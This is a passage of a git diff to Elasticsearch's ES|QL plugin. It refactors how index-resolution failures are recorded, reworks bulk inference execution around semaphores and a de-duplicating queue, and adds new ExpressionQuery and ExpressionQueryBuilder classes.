+6,10 @@ */ package org.elasticsearch.xpack.esql.index; -import org.elasticsearch.action.NoShardAvailableActionException; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; import org.elasticsearch.core.Nullable; +import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Set; @@ -19,33 +19,26 @@ public final class IndexResolution { /** * @param index EsIndex encapsulating requested index expression, resolved mappings and index modes from field-caps. * @param resolvedIndices Set of concrete indices resolved by field-caps. (This information is not always present in the EsIndex). - * @param unavailableShards Set of shards that were unavailable during index resolution - * @param unavailableClusters Remote clusters that could not be contacted during planning + * @param failures failures occurred during field-caps. * @return valid IndexResolution */ - public static IndexResolution valid( - EsIndex index, - Set resolvedIndices, - Set unavailableShards, - Map unavailableClusters - ) { + public static IndexResolution valid(EsIndex index, Set resolvedIndices, Map> failures) { Objects.requireNonNull(index, "index must not be null if it was found"); Objects.requireNonNull(resolvedIndices, "resolvedIndices must not be null"); - Objects.requireNonNull(unavailableShards, "unavailableShards must not be null"); - Objects.requireNonNull(unavailableClusters, "unavailableClusters must not be null"); - return new IndexResolution(index, null, resolvedIndices, unavailableShards, unavailableClusters); + Objects.requireNonNull(failures, "failures must not be null"); + return new IndexResolution(index, null, resolvedIndices, failures); } /** * Use this method only if the set of concrete resolved indices is the same as EsIndex#concreteIndices(). 
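The IndexResolution refactor below collapses `unavailableShards` and `unavailableClusters` into one failures map keyed by cluster alias. As a rough sketch of how such a map is typically populated, with a plain record standing in for `FieldCapabilitiesFailure`:

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

final class FailureCollectionDemo {
    // Plain stand-in for FieldCapabilitiesFailure, just for this sketch.
    record Failure(List<String> indices, String reason) {}

    public static void main(String[] args) {
        Map<String, List<Failure>> failures = new HashMap<>();
        // Each failure is filed under the cluster alias it came from; a single
        // cluster can accumulate several failures (connectivity, shards, ...).
        failures.computeIfAbsent("remote1", k -> new ArrayList<>())
            .add(new Failure(List.of("logs-*"), "cluster unavailable"));
        failures.computeIfAbsent("remote1", k -> new ArrayList<>())
            .add(new Failure(List.of("metrics-1"), "no shard copies available"));
        System.out.println(failures.get("remote1").size()); // 2
    }
}
```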
*/ public static IndexResolution valid(EsIndex index) { - return valid(index, index.concreteIndices(), Set.of(), Map.of()); + return valid(index, index.concreteIndices(), Map.of()); } public static IndexResolution invalid(String invalid) { Objects.requireNonNull(invalid, "invalid must not be null to signal that the index is invalid"); - return new IndexResolution(null, invalid, Set.of(), Set.of(), Map.of()); + return new IndexResolution(null, invalid, Set.of(), Map.of()); } public static IndexResolution notFound(String name) { @@ -59,22 +52,19 @@ public static IndexResolution notFound(String name) { // all indices found by field-caps private final Set resolvedIndices; - private final Set unavailableShards; - // remote clusters included in the user's index expression that could not be connected to - private final Map unavailableClusters; + // map from cluster alias to failures that occurred during field-caps. + private final Map> failures; private IndexResolution( EsIndex index, @Nullable String invalid, Set resolvedIndices, - Set unavailableShards, - Map unavailableClusters + Map> failures ) { this.index = index; this.invalid = invalid; this.resolvedIndices = resolvedIndices; - this.unavailableShards = unavailableShards; - this.unavailableClusters = unavailableClusters; + this.failures = failures; } public boolean matches(String indexName) { @@ -101,11 +91,10 @@ public boolean isValid() { } /** - * @return Map of unavailable clusters (could not be connected to during field-caps query). Key of map is cluster alias, - * value is the {@link FieldCapabilitiesFailure} describing the issue. + * @return Map from cluster alias to failures that occurred during field-caps. */ - public Map unavailableClusters() { - return unavailableClusters; + public Map> failures() { + return failures; } /** @@ -115,13 +104,6 @@ public Set resolvedIndices() { return resolvedIndices; } - /** - * @return set of unavailable shards during index resolution - */ - public Set getUnavailableShards() { - return unavailableShards; - } - @Override public boolean equals(Object obj) { if (obj == null || obj.getClass() != getClass()) { @@ -131,12 +113,12 @@ public boolean equals(Object obj) { return Objects.equals(index, other.index) && Objects.equals(invalid, other.invalid) && Objects.equals(resolvedIndices, other.resolvedIndices) - && Objects.equals(unavailableClusters, other.unavailableClusters); + && Objects.equals(failures, other.failures); } @Override public int hashCode() { - return Objects.hash(index, invalid, resolvedIndices, unavailableClusters); + return Objects.hash(index, invalid, resolvedIndices, failures); } @Override @@ -152,7 +134,7 @@ public String toString() { + ", resolvedIndices=" + resolvedIndices + ", unavailableClusters=" - + unavailableClusters + + failures + '}'; } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java index f6c625752110a..ea1efce460558 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/XContentRowEncoder.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.inference; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.BytesRefStreamOutput; import org.elasticsearch.compute.data.Block; import 
org.elasticsearch.compute.data.BlockFactory; @@ -35,6 +36,8 @@ * Extracted columns can be specified using {@link ExpressionEvaluator} */ public class XContentRowEncoder implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(XContentRowEncoder.class); + private final XContentType xContentType; private final BlockFactory blockFactory; private final ColumnInfoImpl[] columnsInfo; @@ -112,6 +115,15 @@ public BytesRefBlock eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : fieldsValueEvaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public List fieldNames() { return Arrays.stream(columnsInfo).map(ColumnInfoImpl::name).collect(Collectors.toList()); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java index 55f1f49f68c21..48303be617286 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutionState.java @@ -27,8 +27,8 @@ public class BulkInferenceExecutionState { private final Map bufferedResponses; private final AtomicBoolean finished = new AtomicBoolean(false); - public BulkInferenceExecutionState(int bufferSize) { - this.bufferedResponses = new ConcurrentHashMap<>(bufferSize); + public BulkInferenceExecutionState() { + this.bufferedResponses = new ConcurrentHashMap<>(); } /** @@ -125,7 +125,7 @@ public void addFailure(Exception e) { * Indicates whether the entire bulk execution is marked as finished and all responses have been successfully persisted. 
*/ public boolean finished() { - return finished.get() && getMaxSeqNo() == getPersistedCheckpoint(); + return hasFailure() || (finished.get() && getMaxSeqNo() == getPersistedCheckpoint()); } /** diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java index 257799962dda7..1dfedd55a39fe 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutor.java @@ -8,253 +8,344 @@ package org.elasticsearch.xpack.esql.inference.bulk; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.common.util.concurrent.AbstractRunnable; +import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xpack.core.inference.action.InferenceAction; import org.elasticsearch.xpack.esql.inference.InferenceRunner; -import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; import java.util.ArrayList; import java.util.List; -import java.util.concurrent.ArrayBlockingQueue; -import java.util.concurrent.BlockingQueue; +import java.util.Queue; +import java.util.Set; +import java.util.concurrent.ConcurrentLinkedQueue; import java.util.concurrent.ExecutorService; import java.util.concurrent.Semaphore; import java.util.concurrent.atomic.AtomicBoolean; +import java.util.function.Consumer; + +import static org.elasticsearch.xpack.esql.plugin.EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME; /** * Executes a sequence of inference requests in bulk with throttling and concurrency control. */ public class BulkInferenceExecutor { - private final ThrottledInferenceRunner throttledInferenceRunner; - private final BulkInferenceExecutionConfig bulkExecutionConfig; + private final InferenceRunner inferenceRunner; + private final Semaphore permits; + private final ExecutorService executorService; + + /** + * Custom concurrent queue that prevents duplicate bulk requests from being queued. + *
<p>
+ * This queue implementation ensures fairness among multiple concurrent bulk operations + * by preventing the same bulk request from being queued multiple times. It uses a + * backing concurrent set to track which requests are already queued. + *
</p>
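A runnable sketch of the de-duplicating queue described above: a `ConcurrentLinkedQueue` subclass that mirrors membership in a side set so a task can be enqueued at most once until polled. Like the diff, it synchronizes `offer` and `poll` on the set, since the membership update and the queue operation must happen together.

```java
import java.util.Queue;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentLinkedQueue;

final class DedupQueueDemo {
    static <T> Queue<T> dedupQueue() {
        return new ConcurrentLinkedQueue<>() {
            private final Set<T> queued = ConcurrentHashMap.newKeySet();

            @Override
            public boolean offer(T item) {
                synchronized (queued) {
                    // A second offer of the same item is a no-op until it has been polled.
                    return queued.add(item) && super.offer(item);
                }
            }

            @Override
            public T poll() {
                synchronized (queued) {
                    T item = super.poll();
                    if (item != null) {
                        queued.remove(item);
                    }
                    return item;
                }
            }
        };
    }

    public static void main(String[] args) {
        Queue<String> q = dedupQueue();
        System.out.println(q.offer("a") + " " + q.offer("a")); // true false
        System.out.println(q.poll() + " " + q.poll());         // a null
    }
}
```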
+ */ + private final Queue pendingBulkRequests = new ConcurrentLinkedQueue<>() { + private final Set requests = ConcurrentCollections.newConcurrentSet(); + + @Override + public boolean offer(BulkInferenceRequest bulkInferenceRequest) { + synchronized (requests) { + if (requests.add(bulkInferenceRequest)) { + return super.offer(bulkInferenceRequest); + } + return false; // Already exists, don't add duplicate + } + } + + @Override + public BulkInferenceRequest poll() { + synchronized (requests) { + BulkInferenceRequest request = super.poll(); + if (request != null) { + requests.remove(request); + } + return request; + } + } + }; /** * Constructs a new {@code BulkInferenceExecutor}. * - * @param inferenceRunner The inference runner used to execute individual inference requests. - * @param threadPool The thread pool for executing inference tasks. - * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). + * @param inferenceRunner The inference runner used to execute individual inference requests. + * @param threadPool The thread pool for executing inference tasks. + * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). */ public BulkInferenceExecutor(InferenceRunner inferenceRunner, ThreadPool threadPool, BulkInferenceExecutionConfig bulkExecutionConfig) { - this.throttledInferenceRunner = ThrottledInferenceRunner.create(inferenceRunner, executorService(threadPool), bulkExecutionConfig); - this.bulkExecutionConfig = bulkExecutionConfig; + this.inferenceRunner = inferenceRunner; + this.permits = new Semaphore(bulkExecutionConfig.maxOutstandingRequests()); + this.executorService = threadPool.executor(ESQL_WORKER_THREAD_POOL_NAME); } /** - * Executes the provided bulk inference requests. - *
<p>
- * Each request is sent to the {@link ThrottledInferenceRunner} to be executed. - * The final listener is notified with all successful responses once all requests are completed. + * Executes multiple inference requests in bulk and collects all responses. * - * @param requests An iterator over the inference requests to be executed. - * @param listener A listener notified with the complete list of responses or a failure. + * @param requests An iterator over the inference requests to execute + * @param listener Called with the list of all responses in request order */ public void execute(BulkInferenceRequestIterator requests, ActionListener> listener) { + List responses = new ArrayList<>(); + execute(requests, responses::add, ActionListener.wrap(ignored -> listener.onResponse(responses), listener::onFailure)); + } + + /** + * Executes multiple inference requests in bulk with streaming response handling. + *
<p>
+ * This method orchestrates the entire bulk inference process: + * 1. Creates execution state to track progress and responses + * 2. Sets up response handling pipeline + * 3. Initiates asynchronous request processing + *
</p>
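The collecting `execute()` above is a thin adapter over this streaming variant: it passes `responses::add` as the consumer and hands the accumulated list to the listener on completion. A JDK-only sketch of that layering, with plain `Consumer`/`BiConsumer` callbacks standing in for `ActionListener`:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.BiConsumer;
import java.util.function.Consumer;

final class StreamingVsCollecting {
    // Streaming flavor: every item is pushed to onItem and completion is signalled once
    // (a null throwable means success), mirroring execute(requests, consumer, listener).
    static <T> void executeStreaming(Iterable<T> source, Consumer<T> onItem, Consumer<Throwable> onDone) {
        try {
            for (T item : source) {
                onItem.accept(item);
            }
            onDone.accept(null);
        } catch (RuntimeException e) {
            onDone.accept(e);
        }
    }

    // Collecting flavor layered on top, the same trick the diff uses:
    // the list collects each response, then the whole list goes to the listener.
    static <T> void executeCollecting(Iterable<T> source, BiConsumer<List<T>, Throwable> listener) {
        List<T> responses = new ArrayList<>();
        executeStreaming(source, responses::add, err -> listener.accept(err == null ? responses : null, err));
    }

    public static void main(String[] args) {
        executeCollecting(List.of("a", "b"), (all, err) -> System.out.println(err == null ? all : err));
    }
}
```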
+ * + * @param requests An iterator over the inference requests to execute + * @param responseConsumer Called for each successful inference response as they complete + * @param completionListener Called when all requests are complete or if any error occurs + */ + public void execute( + BulkInferenceRequestIterator requests, + Consumer responseConsumer, + ActionListener completionListener + ) { if (requests.hasNext() == false) { - listener.onResponse(List.of()); + completionListener.onResponse(null); return; } - final BulkInferenceExecutionState bulkExecutionState = new BulkInferenceExecutionState( - bulkExecutionConfig.maxOutstandingRequests() - ); - final ResponseHandler responseHandler = new ResponseHandler(bulkExecutionState, listener, requests.estimatedSize()); - - while (bulkExecutionState.finished() == false && requests.hasNext()) { - InferenceAction.Request request = requests.next(); - long seqNo = bulkExecutionState.generateSeqNo(); - - if (requests.hasNext() == false) { - bulkExecutionState.finish(); - } - - ActionListener inferenceResponseListener = ActionListener.runAfter( - ActionListener.wrap( - r -> bulkExecutionState.onInferenceResponse(seqNo, r), - e -> bulkExecutionState.onInferenceException(seqNo, e) - ), - responseHandler::persistPendingResponses - ); - - if (request == null) { - inferenceResponseListener.onResponse(null); - } else { - throttledInferenceRunner.doInference(request, inferenceResponseListener); - } - } + new BulkInferenceRequest(requests, responseConsumer, completionListener).executePendingRequests(); } /** - * Handles collection and delivery of inference responses once they are complete. + * Encapsulates the execution state and logic for a single bulk inference operation. + *
<p>
+ * This inner class manages the complete lifecycle of a bulk inference request, including: + * - Request iteration and permit-based concurrency control + * - Asynchronous execution with hybrid recursion strategy + * - Response collection and ordering via execution state + * - Error handling and completion notification + *
</p>
+ *
<p>
+ * Each BulkInferenceRequest instance represents one bulk operation that may contain + * multiple individual inference requests. Multiple BulkInferenceRequest instances + * can execute concurrently, with fairness ensured through the pending queue mechanism. + *
</p>
*/ - private static class ResponseHandler { - private final List responses; - private final ActionListener> listener; - private final BulkInferenceExecutionState bulkExecutionState; + private class BulkInferenceRequest { + private final BulkInferenceRequestIterator requests; + private final Consumer responseConsumer; + private final ActionListener completionListener; + + private final BulkInferenceExecutionState executionState = new BulkInferenceExecutionState(); private final AtomicBoolean responseSent = new AtomicBoolean(false); - private ResponseHandler( - BulkInferenceExecutionState bulkExecutionState, - ActionListener> listener, - int estimatedSize + BulkInferenceRequest( + BulkInferenceRequestIterator requests, + Consumer responseConsumer, + ActionListener completionListener ) { - this.listener = listener; - this.bulkExecutionState = bulkExecutionState; - this.responses = new ArrayList<>(estimatedSize); + this.requests = requests; + this.responseConsumer = responseConsumer; + this.completionListener = completionListener; } /** - * Persists all buffered responses that can be delivered in order, and sends the final response if all requests are finished. + * Attempts to poll the next request from the iterator and acquire a permit for execution. + *
<p>
+ * Because multiple threads may call this concurrently via async callbacks, this method is synchronized to ensure thread-safe access + * to the request iterator. + *
</p>
+ * + * @return A BulkRequestItem if a request and permit are available, null otherwise */ - public synchronized void persistPendingResponses() { - long persistedSeqNo = bulkExecutionState.getPersistedCheckpoint(); - - while (persistedSeqNo < bulkExecutionState.getProcessedCheckpoint()) { - persistedSeqNo++; - if (bulkExecutionState.hasFailure() == false) { - try { - InferenceAction.Response response = bulkExecutionState.fetchBufferedResponse(persistedSeqNo); - responses.add(response); - } catch (Exception e) { - bulkExecutionState.addFailure(e); - } + private BulkRequestItem pollPendingRequest() { + synchronized (requests) { + if (requests.hasNext()) { + return new BulkRequestItem(executionState.generateSeqNo(), requests.next()); } - bulkExecutionState.markSeqNoAsPersisted(persistedSeqNo); } - sendResponseOnCompletion(); + return null; } /** - * Sends the final response or failure once all inference tasks have completed. + * Main execution loop that processes inference requests asynchronously with hybrid recursion strategy. + *
<p>
+ * This method implements a continuation-based asynchronous pattern with the following features: + * - Queue-based fairness: Multiple bulk requests can be queued and processed fairly + * - Permit-based concurrency control: Limits concurrent inference requests using semaphores + * - Hybrid recursion strategy: Uses direct recursion for performance up to 100 levels, + * then switches to executor-based continuation to prevent stack overflow + * - Duplicate prevention: Custom queue prevents the same bulk request from being queued multiple times + *
</p>
+ *
<p>
+ * Execution flow: + * 1. Attempts to acquire a permit for concurrent execution + * 2. If no permit available, queues this bulk request for later execution + * 3. Polls for the next available request from the iterator + * 4. If no requests available, schedules the next queued bulk request + * 5. Executes the request asynchronously with proper continuation handling + * 6. Uses hybrid recursion: direct calls up to 100 levels, executor-based beyond that + *
</p>
+ *
<p>
+ * The loop terminates when: + * - No more requests are available and no permits can be acquired + * - The bulk execution is marked as finished (due to completion or failure) + * - An unrecoverable error occurs during processing + *
</p>
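The depth parameter implements a common trampoline compromise: direct recursion is cheap, so it is permitted up to a fixed depth, after which the continuation is bounced through the executor to restart from a fresh stack. A self-contained sketch of just that mechanism, reusing the diff's threshold of 100:

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

final class HybridRecursionDemo {
    static final ExecutorService EXECUTOR = Executors.newSingleThreadExecutor();
    static final AtomicInteger remaining = new AtomicInteger(1_000_000);

    static void step(int recursionDepth) {
        if (remaining.decrementAndGet() <= 0) {
            EXECUTOR.shutdown();
            return;
        }
        if (recursionDepth > 100) {
            // Too deep: reschedule on the executor, resetting the stack to depth 0.
            EXECUTOR.execute(() -> step(0));
        } else {
            // Shallow enough: recurse directly and skip a queue round-trip.
            step(recursionDepth + 1);
        }
    }

    public static void main(String[] args) throws InterruptedException {
        EXECUTOR.execute(() -> step(0));
        EXECUTOR.awaitTermination(10, TimeUnit.SECONDS);
        System.out.println("done without StackOverflowError");
    }
}
```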
*/ - private void sendResponseOnCompletion() { - if (bulkExecutionState.finished() && responseSent.compareAndSet(false, true)) { - if (bulkExecutionState.hasFailure() == false) { - try { - listener.onResponse(responses); + private void executePendingRequests() { + executePendingRequests(0); + } + + private void executePendingRequests(int recursionDepth) { + try { + while (executionState.finished() == false) { + if (permits.tryAcquire() == false) { + if (requests.hasNext()) { + pendingBulkRequests.add(this); + } return; - } catch (Exception e) { - bulkExecutionState.addFailure(e); - } - } + } else { + BulkRequestItem bulkRequestItem = pollPendingRequest(); - listener.onFailure(bulkExecutionState.getFailure()); - } - } - } + if (bulkRequestItem == null) { + // No more requests available + // Release the permit we didn't used and stop processing + permits.release(); - /** - * Manages throttled inference tasks execution. - */ - private static class ThrottledInferenceRunner { - private final InferenceRunner inferenceRunner; - private final ExecutorService executorService; - private final BlockingQueue pendingRequestsQueue; - private final Semaphore permits; - - private ThrottledInferenceRunner(InferenceRunner inferenceRunner, ExecutorService executorService, int maxRunningTasks) { - this.executorService = executorService; - this.permits = new Semaphore(maxRunningTasks); - this.inferenceRunner = inferenceRunner; - this.pendingRequestsQueue = new ArrayBlockingQueue<>(maxRunningTasks); - } + // Check if another bulk request is pending for execution. + BulkInferenceRequest nexBulkRequest = pendingBulkRequests.poll(); - /** - * Creates a new {@code ThrottledInferenceRunner} with the specified configuration. - * - * @param inferenceRunner TThe inference runner used to execute individual inference requests. - * @param executorService The executor used for asynchronous execution. - * @param bulkExecutionConfig Configuration options (throttling and concurrency limits). - */ - public static ThrottledInferenceRunner create( - InferenceRunner inferenceRunner, - ExecutorService executorService, - BulkInferenceExecutionConfig bulkExecutionConfig - ) { - return new ThrottledInferenceRunner(inferenceRunner, executorService, bulkExecutionConfig.maxOutstandingRequests()); - } + while (nexBulkRequest == this) { + nexBulkRequest = pendingBulkRequests.poll(); + } - /** - * Schedules the inference task for execution. If a permit is available, the task runs immediately; otherwise, it is queued. - * - * @param request The inference request. - * @param listener The listener to notify on response or failure. - */ - public void doInference(InferenceAction.Request request, ActionListener listener) { - enqueueTask(request, listener); - executePendingRequests(); - } + if (nexBulkRequest != null) { + executorService.execute(nexBulkRequest::executePendingRequests); + } - /** - * Attempts to execute as many pending inference tasks as possible, limited by available permits. 
- */ - private void executePendingRequests() { - while (permits.tryAcquire()) { - AbstractRunnable task = pendingRequestsQueue.poll(); + return; + } - if (task == null) { - permits.release(); - return; - } + if (requests.hasNext() == false) { + // This is the last request - mark bulk execution as finished + // to prevent further processing attempts + executionState.finish(); + } - try { - executorService.execute(task); - } catch (Exception e) { - task.onFailure(e); - permits.release(); + final ActionListener inferenceResponseListener = ActionListener.runAfter( + ActionListener.wrap( + r -> executionState.onInferenceResponse(bulkRequestItem.seqNo(), r), + e -> executionState.onInferenceException(bulkRequestItem.seqNo(), e) + ), + () -> { + // Release the permit we used + permits.release(); + + try { + synchronized (executionState) { + persistPendingResponses(); + } + + if (executionState.finished() && responseSent.compareAndSet(false, true)) { + onBulkCompletion(); + } + + if (responseSent.get()) { + // Response has already been sent + // No need to continue processing this bulk. + // Check if another bulk request is pending for execution. + BulkInferenceRequest nexBulkRequest = pendingBulkRequests.poll(); + if (nexBulkRequest != null) { + executorService.execute(nexBulkRequest::executePendingRequests); + } + return; + } + if (executionState.finished() == false) { + // Execute any pending requests if any + if (recursionDepth > 100) { + executorService.execute(this::executePendingRequests); + } else { + this.executePendingRequests(recursionDepth + 1); + } + } + } catch (Exception e) { + if (responseSent.compareAndSet(false, true)) { + completionListener.onFailure(e); + } + } + } + ); + + // Handle null requests (edge case in some iterators) + if (bulkRequestItem.request() == null) { + inferenceResponseListener.onResponse(null); + return; + } + + // Execute the inference request with proper origin context + inferenceRunner.doInference(bulkRequestItem.request(), inferenceResponseListener); + } } + } catch (Exception e) { + executionState.addFailure(e); } } /** - * Add an inference task to the queue. - * - * @param request The inference request. - * * @param listener The listener to notify on response or failure. + * Processes and delivers buffered responses in order, ensuring proper sequencing. + *
<p>
+ * This method is synchronized to ensure thread-safe access to the execution state + * and prevent concurrent response processing which could cause ordering issues. + * Processing stops immediately if a failure is detected to implement fail-fast behavior. + *
</p>
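This is the familiar sequence-number checkpoint pattern: completions arrive out of order, are buffered by seqNo, and are released strictly in order by advancing a persisted checkpoint past each contiguous entry. A minimal single-threaded sketch (field names hypothetical):

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Consumer;

final class CheckpointDemo {
    private final Map<Long, String> buffered = new HashMap<>();
    private long persistedCheckpoint = -1; // highest seqNo already delivered
    private final Consumer<String> consumer;

    CheckpointDemo(Consumer<String> consumer) {
        this.consumer = consumer;
    }

    // Called whenever a response for some seqNo completes, in any order.
    void onResponse(long seqNo, String response) {
        buffered.put(seqNo, response);
        // Deliver contiguous responses only; stop at the first gap.
        while (buffered.containsKey(persistedCheckpoint + 1)) {
            consumer.accept(buffered.remove(++persistedCheckpoint));
        }
    }

    public static void main(String[] args) {
        CheckpointDemo demo = new CheckpointDemo(System.out::println);
        demo.onResponse(1, "second"); // buffered, waiting for seqNo 0
        demo.onResponse(0, "first");  // prints "first" then "second"
        demo.onResponse(2, "third");  // prints "third"
    }
}
```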
*/ - private void enqueueTask(InferenceAction.Request request, ActionListener listener) { - try { - pendingRequestsQueue.put(createTask(request, listener)); - } catch (Exception e) { - listener.onFailure(new IllegalStateException("An error occurred while adding the inference request to the queue", e)); + private void persistPendingResponses() { + long persistedSeqNo = executionState.getPersistedCheckpoint(); + + while (persistedSeqNo < executionState.getProcessedCheckpoint()) { + persistedSeqNo++; + if (executionState.hasFailure() == false) { + try { + InferenceAction.Response response = executionState.fetchBufferedResponse(persistedSeqNo); + responseConsumer.accept(response); + } catch (Exception e) { + executionState.addFailure(e); + } + } + executionState.markSeqNoAsPersisted(persistedSeqNo); } } /** - * Wraps an inference request into an {@link AbstractRunnable} that releases its permit on completion and triggers any remaining - * queued tasks. - * - * @param request The inference request. - * @param listener The listener to notify on completion. - * @return A runnable task encapsulating the request. + * Call the completion listener when all requests have completed. */ - private AbstractRunnable createTask(InferenceAction.Request request, ActionListener listener) { - final ActionListener completionListener = ActionListener.runAfter(listener, () -> { - permits.release(); - executePendingRequests(); - }); - - return new AbstractRunnable() { - @Override - protected void doRun() { - try { - inferenceRunner.doInference(request, completionListener); - } catch (Throwable e) { - listener.onFailure(new RuntimeException("Unexpected failure while running inference", e)); - } + private void onBulkCompletion() { + if (executionState.hasFailure() == false) { + try { + completionListener.onResponse(null); + return; + } catch (Exception e) { + executionState.addFailure(e); } + } - @Override - public void onFailure(Exception e) { - completionListener.onFailure(e); - } - }; + completionListener.onFailure(executionState.getFailure()); } } - private static ExecutorService executorService(ThreadPool threadPool) { - return threadPool.executor(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME); + /** + * Encapsulates an inference request with its associated sequence number. + *
<p>
+ * The sequence number is used for ordering responses and tracking completion + * in the bulk execution state. + *
</p>
+ * + * @param seqNo Unique sequence number for this request in the bulk operation + * @param request The actual inference request to execute + */ + private record BulkRequestItem(long seqNo, InferenceAction.Request request) { + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java new file mode 100644 index 0000000000000..f3051b36adc06 --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQuery.java @@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +package org.elasticsearch.xpack.esql.io.stream; + +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; +import org.elasticsearch.xpack.esql.core.tree.Source; + +import java.util.Objects; + +/** + * Implements an Expression query, which matches documents based on a given expression. + */ +public class ExpressionQuery extends Query { + + private final String targetFieldName; + private final Expression expression; + + public ExpressionQuery(Source source, String targetFieldName, Expression expression) { + super(source); + this.targetFieldName = targetFieldName; + this.expression = expression; + } + + public String field() { + return targetFieldName; + } + + @Override + protected QueryBuilder asBuilder() { + return new ExpressionQueryBuilder(targetFieldName, expression); + } + + @Override + public int hashCode() { + return Objects.hash(targetFieldName, expression); + } + + @Override + public boolean equals(Object obj) { + if (this == obj) { + return true; + } + + if (obj == null || getClass() != obj.getClass()) { + return false; + } + + ExpressionQuery other = (ExpressionQuery) obj; + return Objects.equals(targetFieldName, other.targetFieldName) && Objects.equals(expression, other.expression); + } + + @Override + protected String innerToString() { + return "ExpressionQuery{" + "field='" + targetFieldName + '\'' + '}'; + } + + @Override + public boolean containsPlan() { + return true; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java new file mode 100644 index 0000000000000..7c4d26f2dff86 --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/ExpressionQueryBuilder.java @@ -0,0 +1,123 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.xpack.esql.io.stream; + +import org.apache.lucene.search.MatchNoDocsQuery; +import org.apache.lucene.search.Query; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.AbstractQueryBuilder; +import org.elasticsearch.index.query.MultiTermQueryBuilder; +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.Expression; + +import java.io.IOException; +import java.util.Objects; + +import static org.apache.lucene.search.MultiTermQuery.CONSTANT_SCORE_REWRITE; + +/** + * Implements an Expression query builder, which matches documents based on a given expression. + * The expression itself must provide the {@link TranslationAware#asLuceneQuery} interface to be translated into a Lucene query. + * It allows for serialization of the expression and generate an AutomatonQuery on the data node + * as Automaton does not support serialization. + */ +public class ExpressionQueryBuilder extends AbstractQueryBuilder implements MultiTermQueryBuilder { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + QueryBuilder.class, + "expressionQueryBuilder", + ExpressionQueryBuilder::new + ); + private final String fieldName; + private final Expression expression; + + public ExpressionQueryBuilder(String fieldName, Expression expression) { + if (Strings.isEmpty(fieldName)) { + throw new IllegalArgumentException("field name is null or empty"); + } + if (expression == null) { + throw new IllegalArgumentException("expression cannot be null"); + } + this.fieldName = fieldName; + this.expression = expression; + } + + /** + * Read from a stream. 
